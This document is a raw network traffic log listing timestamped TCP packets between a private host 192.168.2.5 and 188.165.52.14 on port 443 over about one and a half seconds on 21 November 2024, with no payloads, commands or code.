Nov 21, 2024 22:12:16.118884087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.118908882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.125833035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.125869036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.125927925 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.125941992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.125983000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.132229090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.132260084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.132301092 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.132313967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.132339954 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.132360935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.138855934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.138885021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.138926029 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.138941050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.138962984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.138986111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.144998074 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.145021915 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.145071983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.145087957 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.145112038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.145136118 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.150924921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.150945902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.151047945 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.151065111 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.151133060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.158021927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.158044100 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.158113003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.158128023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.158174992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.237754107 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.237785101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.237862110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.237886906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.237917900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.237931013 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.311243057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.311265945 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.311407089 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.311428070 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.311470032 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.316921949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.316940069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.317012072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.317027092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.317068100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.322396994 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.322415113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.322482109 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.322498083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.322539091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.328047991 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.328068018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.328150988 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.328166008 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.328212023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.333357096 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.333376884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.333440065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.333453894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.333493948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.338689089 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.338707924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.338792086 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.338807106 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.338845968 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.344450951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.344470978 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.344558001 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.344575882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.344614983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.429872036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.429897070 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.430033922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.430056095 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.430092096 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.503532887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.503567934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.503712893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.503734112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.503772974 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.508361101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.508385897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.508465052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.508480072 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.508516073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.514100075 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.514123917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.514184952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.514199018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.514235973 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.519771099 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.519793034 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.519889116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.519911051 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.519948006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.525415897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.525438070 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.525515079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.525532007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.525569916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.530689955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.530714035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.530806065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.530826092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.530869961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.536214113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.536226034 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.536308050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.536324024 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.536360025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.621959925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.621984959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.622117996 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.622143984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.622188091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.695523977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.695549965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.695657969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.695682049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.695732117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.700937033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.700963020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.701039076 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.701050997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.701093912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.706095934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.706125975 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.706235886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.706254959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.706294060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.711534023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.711561918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.711610079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.711632013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.711647987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.711669922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.717147112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.717171907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.717212915 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.717231035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.717252016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.717262983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.722552061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.722579002 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.722637892 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.722656965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.722671986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.722697973 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.728116035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.728141069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.728188038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.728204012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.728220940 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.728236914 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.836049080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.836082935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.836224079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.836257935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.836301088 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.888145924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.888170958 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.888431072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.888464928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.888514042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.893081903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.893104076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.893188953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.893208981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.893256903 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.898791075 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.898814917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.898880005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.898907900 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.898947001 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.904308081 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.904329062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.904400110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.904421091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.904458046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.909950972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.909971952 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.910034895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.910062075 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.910200119 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.915278912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.915302038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.915375948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.915395021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.915430069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.920521021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.920542002 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.920602083 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:16.920624018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:16.920660019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.029870033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.029898882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.030148983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.030179977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.030230045 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.079993010 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.080020905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.080147028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.080177069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.080224991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.085299969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.085325956 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.085407019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.085429907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.085472107 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.090904951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.090925932 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.091006994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.091026068 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.091063023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.096570969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.096596003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.096662045 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.096678019 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.096714973 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.101502895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.101526022 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.101588011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.101602077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.101638079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.106781960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.106805086 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.106863976 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.106880903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.106920004 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.112448931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.112474918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.112535000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.112549067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.112584114 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.222091913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.222121954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.222260952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.222290039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.225538969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.272084951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.272116899 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.272253990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.272279978 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.273263931 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.277704954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.277729988 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.277779102 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.277796030 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.277808905 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.277836084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.282804012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.282825947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.282908916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.282926083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.283813000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.288252115 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.288271904 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.288325071 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.288340092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.288594007 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.294100046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.294120073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.294178009 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.294192076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.294275999 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.299263000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.299283981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.299343109 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.299356937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.300280094 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.305001020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.305022955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.305073977 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.305088043 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.305957079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.413749933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.413779020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.413927078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.413959980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.414872885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.464155912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.464179993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.464261055 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.464293003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.464345932 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.469824076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.469847918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.469939947 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.469955921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.470005035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.475470066 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.475491047 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.475574970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.475588083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.475683928 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.481215000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.481234074 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.481308937 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.481324911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.481928110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.486136913 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.486157894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.486222029 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.486237049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.486301899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.491383076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.491404057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.491483927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.491497993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.491709948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.497014046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.497036934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.497104883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.497118950 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.497309923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.606586933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.606611013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.606745005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.606774092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.606868029 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.656105995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.656153917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.656306028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.656353951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.656455994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.661577940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.661619902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.661669016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.661686897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.661698103 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.661725044 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:17.667396069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.667438030 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:17.667476892 CET	49824	443	192.168.2.5	188.165.52.14
